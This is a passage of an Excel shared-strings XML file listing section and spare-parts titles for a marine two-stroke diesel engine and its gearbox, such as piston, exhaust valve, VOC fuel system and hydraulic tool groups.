    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. COVER, GRINDING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. COVER, SUPPORT TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.COV.,HYDR.JACK SPARES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. COVER, LIFTING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON AND PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston Rod Stuffing Box - K90GF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubr. and Cooling Oil System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston, Rod and Stuff.Box Panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston Rod Nut Panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON and ROD, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON CROWN, HYDR. TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON, LIFTING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LINER &amp; COOL. JACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LINER, DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LUBRICATOR, DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.LUB.,INTERMEDIATE BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBR. LOAD CHANGE DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRONIC.COMP. CYL.LUB.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder Liner and Frame - Panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LINER, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LINER, EKSTRA TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST EQUIPM. ALPHA-LUBR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Equipment for Special Running</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LINER, LIFTING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN. ROD + CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD + CROSSH.DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBR.AND COOLING OIL FLOW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD + CROSSH., PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Conn. Rod + Crosshead, Details</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN. ROD, HYDR.TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crosshead End, Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST / GUIDE BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF FORE END WITH PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRIGGER RING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORS.VIBR. MONITOR SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust bearing monitoring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNING GEAR, DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TACHO EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Generator Coupling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Torsional vibration damper</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSH, THRUSTSH., PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING, HYDR.TOOLS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING, LIFT.TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT, HYDR. TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUNTERWEIGHT, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turning Gear and Wheel - Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING, MEAS. TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUNING WHEEL, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. CHAIN DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN DRIVE AND GUIDEBARS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN DRIVE, LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Brake air cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of Reversing Mechanism</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. INDICATOR SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of Governor Amplifier</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Assembly of Regulating Shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENG.-SIDE CONTROL CONSOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENG.-SIDE CONSOLE,DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF LAYSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air Distributor Drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOMENT COMP., LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN DR. LUBRIC.,UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN DR. LUBRIC.,LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR. POWER SUPPLY, DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Supply Components</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Valve Block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTR.COMP., ENG.CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng. Contr. System,Wire+Encl.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENG.CTRL.ROOM, COMPONENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stop Valve, Complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN DR. CAMSHAFT, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT, HYDRAULIC TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Chain Drive, Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT COUPL.HYDR.TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOMENT COMPENSATOR, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft Bearing, Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Power Supply, Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main Hydr.Pipe - Hydraulic Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test Equipment for Accumulators</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of Reversing and Starting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pneumatic/Hydraulic Booster</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shut-Off Cock</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL AIR SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control Group - Start/Stop</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arrangement of Master Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Starting Air System,Panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE,UPPER PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.VALVE,UPPER P.DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust Valve - Actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH. VALVE, PIPE SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF COOL. WATER PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.DRAIN PIPE FRESHWATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE, PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH. VALVE,EXTRACTOR TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH. VALVE ACTUATOR,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP GEAR - DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel Valve Guard</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas Control Block, Detail</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shut-Down Valve (VOC)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blow-Off Valve (VOC)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel Valve (VOC)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pilot Oil Pipes (VOC)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VOC Pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seal Oil Pipes (VOC)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control Oil Pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL VALVE NOZZLE-TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUNCTURE VALVE,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TESTING OF VOC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPTER AND PLUGS FOR VOC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST TOOL, VOC VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount Tool, Top Cover Seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sealing Tool, Hydraulic H.P.Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPES and RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH. RECEIVER, DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF AUXILIARY BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAL.AIR SYST,TURBOCHARG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbine Rotor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricating Oil Pipes, Etc.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>El. Diagram, Auxiliary Blower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control Box, Auxiliary Blower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine Guard, Auxiliary Blower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust Gas - Bypass System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TCS arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER and TURBOCH., PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCH.ROTOR, CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER, LIFTING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY VALVE, CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY VALVE, SCAV.AIR S.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Monitoring of Bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL LEAKAGE MONITOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manual shutdown valve, f.o.syst.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flow alarm</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder Cover Protective Shield</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain Box, Details</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY VALVE TESTING DEV.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Frame Parts, Etc.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END SHIELDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of Proximeter Probe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hold.-Down+End-Chock Bolts,Iron</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.D.+E-CHOCK BOLTS, EPOXY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top Bracing - Hydr.Syst.,Details</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricating Oil Diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HY.TOOL,HD+EC BOLTS EPOXY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HY.TOOL,HD+EC BOLTS IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HY.TOOL,HD BOLTS EPOXY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HY.TOOL,EC BOLTS EPOXY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HY.TOOL,HD BOLTS IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HY.TOOL,EC BOLTS IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for Top Bracing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Tools for Top Bracing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grinding Machines, Valve Seat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools, Charging Air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACCESSORIES, HYDR. TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTENING-UP INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOLS, ETC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPEN ENDED SPANNERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPEN ENDED SLUGG.SPANNERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLIERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPANNERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPANNERS, ETC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Counter weight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manoeuvring device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Axial vibration damper, details</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stud and nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air reservoir and Unit box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electrical console</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Starting piston valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Automatic main stop valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arrangement of by-pass valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pneumatic manoeuvring system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arrangement of starting system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Function of master valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shield for caMShaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connecting box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Chainwheel frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foot liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Govenor, details</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Head tank pressure system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure booster</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scavenging air system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slide valve, details</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Start/Stop installation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning tank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VMON SYSTEM,DOCUMENTATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Software embedded</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AVM SYSTEM, DOCUMENTATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox design</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operating of gearbox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maintenance program</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Trouble shooting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Input shaft with clutch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Input shaft without clutch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Output shaft with servo piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Output shaft without servopiston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic servo system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Local monitoring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manual control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sensors on gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tightening and lubricating</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Securing of screws and nuts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear wheel and pinion - check</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil prefilter - check and clean</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure filter - check, clean</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil accumulator - check</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Internal pipes and hoses - check</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Replacement of oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adjustment of oil pressures</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil cooler - check and clean</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj. and test of press.control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj. and test of transmitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj. and test of level sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj. and test of tacho and prox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj. and test of pitch sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox with bearing caps</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearings in gearbox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End covers</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covers on gearbox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Assembling engine/gearbox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexstar modul with bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pump drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear wheel for intermediate shaf</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear wheel for output shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexstar spline</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexstar intermediate flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexstar shaft journal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Standby oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil prefilter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stand-by oil prefilter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Low/high pressure filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricating oil termostate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Back pressure valve/safety valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch control system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Actuator for clutch function</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pipes, internal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pipes, external</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil pipes for PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch indicator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power take-off</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate flange for PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pinion for power take-off</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearwheel for power take-off</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft for power take-off</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft with pinion for PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Belt pulley</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AP system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Local instrumentation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>External instrumentation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing sensors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Speed/position sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aut. Start of stand-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aut. Stop of engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Automatic load reduction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency locking device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Warning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main data for engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Designation of cylinders</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine rotation clockwise</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plann.maint.prog. major overh.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plann.maint.prog. duties d.o.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operation data and set points</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Green passport</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>How to return spare parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Conversion table</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Out of service</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Low-load ope. on HFO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide lines low sulphur fuel oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>O. eng. at low frequency</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine performance and cond.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Condensate amount</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Faults in fuel oil system</t>
    <phoneticPr fontId="5" type="noConversion"/>
